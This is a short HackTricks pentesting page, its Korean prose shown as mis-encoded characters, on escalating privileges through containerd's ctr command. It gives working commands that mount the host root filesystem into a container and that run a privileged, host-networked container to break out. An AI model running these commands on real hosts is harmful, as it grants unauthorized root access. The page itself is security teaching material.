Containerd (ctr) Privilege Escalation

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

๋‹ค์Œ ๋งํฌ๋กœ ๊ฐ€์„œ containerd๊ฐ€ ๋ฌด์—‡์ธ์ง€์™€ ctr์— ๋Œ€ํ•ด ์•Œ์•„๋ณด์„ธ์š”:

2375, 2376 Pentesting Docker

PE 1

ํ˜ธ์ŠคํŠธ์— ctr ๋ช…๋ น์ด ํฌํ•จ๋˜์–ด ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค:

which ctr
/usr/bin/ctr

์ด๋ฏธ์ง€๋ฅผ ๋‚˜์—ดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

ctr image list
REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -

๊ทธ๋ฆฌ๊ณ  ํ˜ธ์ŠคํŠธ ๋ฃจํŠธ ํด๋”๋ฅผ ๋งˆ์šดํŠธํ•˜์—ฌ ํ•ด๋‹น ์ด๋ฏธ์ง€ ์ค‘ ํ•˜๋‚˜๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค:

ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash

PE 2

ํŠน๊ถŒ์ด ์žˆ๋Š” ์ปจํ…Œ์ด๋„ˆ๋ฅผ ์‹คํ–‰ํ•˜๊ณ  ๊ทธ๋กœ๋ถ€ํ„ฐ ํƒˆ์ถœํ•ฉ๋‹ˆ๋‹ค.
ํŠน๊ถŒ์ด ์žˆ๋Š” ์ปจํ…Œ์ด๋„ˆ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash

๊ทธ๋Ÿฐ ๋‹ค์Œ ํŠน๊ถŒ ๊ธฐ๋Šฅ์„ ์•…์šฉํ•˜์—ฌ ํƒˆ์ถœํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ ํŽ˜์ด์ง€์— ์–ธ๊ธ‰๋œ ๋ช‡ ๊ฐ€์ง€ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

Docker Security

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ